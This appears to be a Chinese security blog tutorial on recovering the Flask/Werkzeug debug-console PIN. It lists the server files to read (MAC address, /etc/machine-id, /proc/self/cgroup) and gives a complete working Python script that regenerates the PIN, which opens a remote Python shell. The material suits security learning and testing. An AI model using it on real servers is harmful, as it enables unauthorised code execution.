Flask Debug窗口python shell的Pin码破解

作者: const27 分类: All,杂七杂八的安全问题 发布时间: 2020-06-11 09:27

参考链接: https://www.cnblogs.com/MisakaYuii-Z/p/12407760.html
https://www.cnblogs.com/HacTF/p/8160076.html

Pin码?

何为Pin码,就是Flask开启debug模式时,可以通过输入Pin码的方式在debug界面进入python shell。(低版本flask不需要pin码就可以进入shell)
点击debug页面此处的按钮,即可进入pin码输入验证模式

Pin码组成所需元素?

1.服务器运行Flask所登录的用户名(root或其他)
2.modname,一般为flask.app
3.一个不知道叫啥的值(- -!),一般为Flask
4.flask库下的app.py绝对路径,可由debug页面获得
5.当前网络的mac地址的十进制数. mac地址在linux系统里的 /sys/class/net/eth0/address


6.机器的ID, linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件 ,如果是docker机器,则在 /proc/self/cgroup

Pin码破解(Pin码再生成)

只要我们把上面的六个元素找到,就可以通过 Lib\site-packages\werkzeug\debug\\_\_init__.py 这个代码生成PIN码了
这个文件我们把它抽取出来了

import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.7/site-packages/flask/app.py',
]

private_bits = [
    '2485410391036',
    '25f34b1b3cf9815ee85b0089a6203547ca22efbdbbc16f0c39d70fb528f773a1'
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注

2 × 2 =

标签云